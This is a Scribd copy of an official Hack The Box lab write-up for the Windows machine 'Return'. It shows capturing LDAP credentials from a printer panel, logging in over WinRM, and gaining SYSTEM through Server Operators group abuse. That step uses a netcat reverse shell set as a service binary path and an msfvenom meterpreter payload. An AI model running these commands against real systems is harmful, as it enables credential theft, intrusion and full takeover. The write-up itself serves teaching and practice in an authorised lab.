Scribd
Upload
13 views9 pages

Return

The document outlines a penetration testing scenario on a Windows machine named 'Return', which involves exploiting a network printer administration panel to capture LDAP credentials and gain access via the WinRM service. It details the enumeration process using Nmap and the exploitation steps, including privilege escalation through the Server Operators group to obtain a reverse shell. The final steps involve using Metasploit to establish a stable meterpreter session and retrieve the root flag.

Uploaded by

phantomsixth6
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
13 views9 pages

Return

The document outlines a penetration testing scenario on a Windows machine named 'Return', which involves exploiting a network printer administration panel to capture LDAP credentials and gain access via the WinRM service. It details the enumeration process using Nmap and the exploitation steps, including privilege escalation through the Server Operators group to obtain a reverse shell. The final steps involve using Metasploit to establish a stable meterpreter session and retrieve the root flag.

Uploaded by

phantomsixth6
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Return

27th May 2021 / Document No D21.101.183

Prepared By: MrR3boot

Machine Author(s): MrR3boot

Difficulty: Easy

Classification: Official

Synopsis
Return is an easy difficulty Windows machine featuring a network printer administration panel that stores
LDAP credentials. These credentials can be captured by inputting a malicious LDAP server which allows
obtaining foothold on the server through the WinRM service. User found to be part of a privilege group
which further exploited to gain system access.

Skills Required
Basic Windows Knowledge

Beginner Active Directory Knowledge

Skills Learned
Network Printer Abuse

Server Operators Group Abuse

Enumeration
Nmap
Let's start with port scan.
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.233 | grep ^[0-9] | cut -d '/' -f 1 | tr
'\n' ',' | sed s/,$//)
nmap -p$ports -sV -sC 10.10.10.233

Nmap output shows that the target is a Windows machine with ports 80 (Internet Information Services), 445
(SMB) and 5985 (Windows Remote Management) available.

SMB
Let's enumerate SMB service using enum4linux tool.

This reveals that the host is part of the RETURN domain. SMB does not allow NULL or guest sessions, so can
turn our attention to the website.

IIS
This reveals a printer admin panel, such as you find on enterprise Canon, Xerox and Epson multifunction
devices. Navigating to Settings reveals a username and domain name.

Foothold
These devices store LDAP and SMB credentials, in order for the printer to query the user list from Active
Directory, and to be able to save scanned files to a user drive. These configuration pages typically allow the
domain controller or file server to be specified. Let's stand up a listener on port 389 (LDAP) and specify our
tun0 IP address in the Server address field.

sudo nc -lvnp 389


A connection is received, and the credentials of svc-printer is revealed. From portscan we see WinRM
port is open. Let's connect to the service using evil-winrm tool.

gem install evil-winrm


evil-winrm -i 10.10.10.233 -u svc-printer -p '1edFg43012!!'

Privilege Escalation
Enumerating group memberships reveals that svc-printer is part of Server Operators group.
We can read more about this group here. Members of this group can start/stop system services. Let's
modify a service binary path to obtain a reverse shell.

upload /usr/share/windows-resources/binaries/nc.exe
sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.2
1234"

Stand up a listener on port 1234 and issue the below commands to obtain the reverse shell.

sc.exe stop vss


sc.exe start vss

The above-obtained shell is unstable and might die after a few seconds. A more efficient way would be to
obtain a meterpreter shell and then quickly migrate to a more stable process.

We can use msfvenom to generate a meterpreter reverse shell executable payload file for the Windows
remote host.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=1337 -f exe > shell-
x86.exe

Using the current Evil-WinRM shell, the executable can be uploaded on the remote host.

upload shell.exe

Next, we will use the Metasploit console to configure a listener for a reverse shell session on a Windows
target.

msfconsole

Select the multi/handler exploit module, which is used to listen for incoming connections from a
compromised system.

use exploit/multi/handler
Set the payload as windows/meterpreter/reverse_tcp that allows for a reverse TCP connection to be
established between the attacker's machine and the target.

set PAYLOAD windows/meterpreter/reverse_tcp


set LHOST YOUR_IP
set LPORT 1337

Start the listener using the run command.

Using the existing shell, let's modify a service binary path to obtain a reverse shell.

sc.exe config vss binPath="C:\Users\svc-printer\Desktop\shell.exe"


We already have our Metasploit listener running on port 1337 , so let us now issue the below commands to
obtain the reverse shell.

sc.exe stop vss


sc.exe start vss

After obtaining a meterpreter session, use the ps command to list the running processes on the remote
box.

Choose an appropriate process which is running as NT AUTHORITY\SYSTEM and migrate to it. In this case,
we will be migrating to the process with PID 3172.

migrate <PID>
We can now spawn a shell and grab the root flag.

shell

You might also like